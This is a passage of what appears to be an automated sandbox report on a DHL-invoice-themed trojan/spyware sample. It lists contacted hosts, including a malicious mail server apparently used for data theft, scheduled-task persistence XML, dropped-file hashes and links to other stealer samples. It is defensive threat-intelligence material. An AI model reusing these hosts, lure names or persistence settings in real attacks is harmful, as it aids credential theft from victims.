                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL_231437894819.bat.exe, 00000000.00000002.1467243677.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, DHL_231437894819.bat.exe, 00000000.00000002.1467243677.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1555427783.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0DHL_231437894819.bat.exe, uvbIwIYe.exe.0.drfalse
                                            		high
                                            http://mail.keeptraveling-eg.comRegSvcs.exe, 0000000A.00000002.1534737744.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002E5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://ip-api.comRegSvcs.exe, 0000000A.00000002.1534737744.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              208.95.112.1
                                              		ip-api.comUnited States
                                              		53334TUT-ASUSfalse
                                              104.26.13.205
                                              		api.ipify.orgUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              162.241.224.14
                                              		mail.keeptraveling-eg.comUnited States
                                              		46606UNIFIEDLAYER-AS-1UStrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1578149
                                              Start date and time:2024-12-19 10:27:20 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 14s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:21
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:DHL_231437894819.bat.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@23/15@3/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 185
                                              • Number of non-executed functions: 38
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 52.149.20.212
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              04:28:27API Interceptor2x Sleep call for process: DHL_231437894819.bat.exe modified
                                              04:28:33API Interceptor42x Sleep call for process: powershell.exe modified
                                              04:28:36API Interceptor8810346x Sleep call for process: RegSvcs.exe modified
                                              04:28:37API Interceptor2x Sleep call for process: uvbIwIYe.exe modified
                                              10:28:35Task SchedulerRun new task: uvbIwIYe path: C:\Users\user\AppData\Roaming\uvbIwIYe.exe

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              208.95.112.1dlhost.exeGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                              • ip-api.com/json
                                              xt.exeGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • ip-api.com/json
                                              roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • ip-api.com/json
                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                              • ip-api.com/json
                                              x.ps1Get hashmaliciousQuasarBrowse
                                              • ip-api.com/json/
                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • ip-api.com/json/
                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • ip-api.com/json/
                                              Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • ip-api.com/json/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              mail.keeptraveling-eg.comDHL-SOA_88417.batGet hashmaliciousAgentTeslaBrowse
                                              • 162.241.224.14
                                              DHL-INVOICE- 1851940333.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 162.241.224.14
                                              DHL- INVOICE-1851940333.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 162.241.224.14
                                              DHL-AIR-WAYBILL.batGet hashmaliciousAgentTeslaBrowse
                                              • 162.241.224.14
                                              DHL-INVOICE-4977440333.bat.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.241.224.14
                                              DHL-INVOICE-00660840.batGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 162.241.224.14
                                              DHL INVOICE.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 162.241.224.14
                                              ip-api.comdlhost.exeGet hashmaliciousXWormBrowse
                                              • 208.95.112.1
                                              WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                              • 208.95.112.1
                                              xt.exeGet hashmaliciousXWormBrowse
                                              • 208.95.112.1
                                              roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • 208.95.112.1
                                              roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • 208.95.112.1
                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                              • 208.95.112.1
                                              x.ps1Get hashmaliciousQuasarBrowse
                                              • 208.95.112.1
                                              https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                              • 208.95.112.2
                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • 208.95.112.1
                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • 208.95.112.1
                                              api.ipify.orgiviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.12.205
                                              script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.12.205
                                              script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.12.205
                                              WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                              • 104.26.12.205
                                              cali.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 104.26.13.205
                                              PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 104.26.12.205
                                              Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 172.67.74.152
                                              winws1.exeGet hashmaliciousUnknownBrowse
                                              • 104.26.12.205
                                              KASHI SHIP PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.74.152

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSOverheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 104.21.67.152
                                              HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                              • 172.67.177.134
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                              • 172.67.179.109
                                              CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                              • 162.247.243.29
                                              contract_signed.pdfGet hashmaliciousUnknownBrowse
                                              • 104.21.16.1
                                              https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.12.205
                                              script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.12.205
                                              MFQbv2Yuzv.exeGet hashmaliciousLummaC, StealcBrowse
                                              • 104.21.64.80
                                              SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.86.111
                                              UNIFIEDLAYER-AS-1USvRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                              • 69.49.245.172
                                              https://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                              • 192.185.195.214
                                              https://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                              • 192.185.113.94
                                              DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 192.185.158.101
                                              PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 192.185.13.234
                                              x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 166.63.22.4
                                              https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                              • 108.167.188.184
                                              KASHI SHIP PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                              • 50.87.144.157
                                              PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 192.185.13.234
                                              https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                              • 162.241.149.91
                                              TUT-ASUSdlhost.exeGet hashmaliciousXWormBrowse
                                              • 208.95.112.1
                                              WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                              • 208.95.112.1
                                              xt.exeGet hashmaliciousXWormBrowse
                                              • 208.95.112.1
                                              roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • 208.95.112.1
                                              roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • 208.95.112.1
                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                              • 208.95.112.1
                                              x.ps1Get hashmaliciousQuasarBrowse
                                              • 208.95.112.1
                                              https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                              • 208.95.112.2
                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • 208.95.112.1
                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • 208.95.112.1

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                              • 104.26.13.205
                                              Dix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
                                              • 104.26.13.205
                                              Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                              • 104.26.13.205
                                              main1.batGet hashmaliciousAbobus ObfuscatorBrowse
                                              • 104.26.13.205
                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 104.26.13.205
                                              dlhost.exeGet hashmaliciousXWormBrowse
                                              • 104.26.13.205
                                              NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                              • 104.26.13.205
                                              Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 104.26.13.205
                                              TT copy.jsGet hashmaliciousFormBookBrowse
                                              • 104.26.13.205
                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                              • 104.26.13.205

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_231437894819.bat.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\DHL_231437894819.bat.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uvbIwIYe.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\uvbIwIYe.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.379460230152629
                                              Encrypted:false
                                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                              MD5:4DC84D28CF28EAE82806A5390E5721C8
                                              SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                              SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                              SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                              Malicious:false
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lc250ra.wlo.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bck5f40.qjp.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wpok5wt.wyd.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blocxhty.aph.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cayqkhgp.2ph.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cglna1nk.qns.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwi1e3yn.u4e.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tsxxvzii.j4p.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\tmp1E51.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\DHL_231437894819.bat.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1567
                                              Entropy (8bit):5.1066684367748785
                                              Encrypted:false
                                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTFv:He7XQBBYrFdOFzOz6dKrsuJ
                                              MD5:C7A02A5B6394BF9114E1F12B2EB0BCAB
                                              SHA1:4841A38955D5AFA0FC893812089BB67A59063651
                                              SHA-256:3A457441E5445C4B4FE52FCA6A5B62C4C36BE9E3713389860D707BD32283FBEF
                                              SHA-512:471494AC9A59CFEB93393661DEEC03705E3754730E123E140F8991526CB6B0AEC90F39E62B3C633775F8BC3DF7465728DDA1A7BA43D6AC7491437F5492C7D04A
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                              C:\Users\user\AppData\Local\Temp\tmp40DD.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\uvbIwIYe.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1567
                                              Entropy (8bit):5.1066684367748785
                                              Encrypted:false
                                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTFv:He7XQBBYrFdOFzOz6dKrsuJ
